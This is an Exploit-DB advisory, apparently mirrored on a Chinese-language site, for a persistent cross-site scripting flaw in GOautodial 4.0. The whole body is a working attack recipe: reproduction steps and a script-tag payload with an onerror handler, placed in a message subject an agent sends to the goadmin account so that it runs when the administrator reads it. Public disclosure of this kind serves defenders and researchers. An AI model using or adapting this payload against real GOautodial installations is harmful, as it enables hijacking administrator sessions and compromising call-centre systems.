GOautodial 4.0 – Persistent Cross-Site Scripting (Authenticated)

Exploit Database
99 阅读

作者： Balzabu

日期： 2020-07-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48690/

# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated)
# Author: Balzabu
# Discovery Date: 2020-07-23
# Vendor Homepage: https://goautodial.org/
# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
# Tested Version: 4.0 (Last relase as of today)
# Tested on OS: CentOS 7

# STEPS TO REPRODUCE:

# 1 - Log in as an agent
# 2 - Write a new message to user goadmin with:
Subject: Help me, I can't connect to the webphone <script src=1
href=1 onerror="javascript:alert(document.cookies)"></script>
Text: whatever you want
# 3 - Send and wait for goadmin to read the message... :-)

last Exploits
GOautodial 4.0 – Persistent Cross-Site Scripting (Authenticated)的更多信息

D-Link IP Cameras – Multiple Vulnerabilities：
appRain CMF 4.0.5 – Remote Code Execution (RCE) (Authenticated)：
PHP Designer 2007 Personal – Multiple SQL Injections：
TP-Link Gateway 3.12.4 – Multiple Vulnerabilities：
Mantis Bug Tracker 1.2.3 – ‘db_type’ Cross-Site Scripting / Full Path Disclosure：
Joomla! Component Canteen 1.0 – Local File Inclusion：
mPDF 5.3 – File Disclosure：
B-Hind CMS (tiny_mce) – Arbitrary File Upload：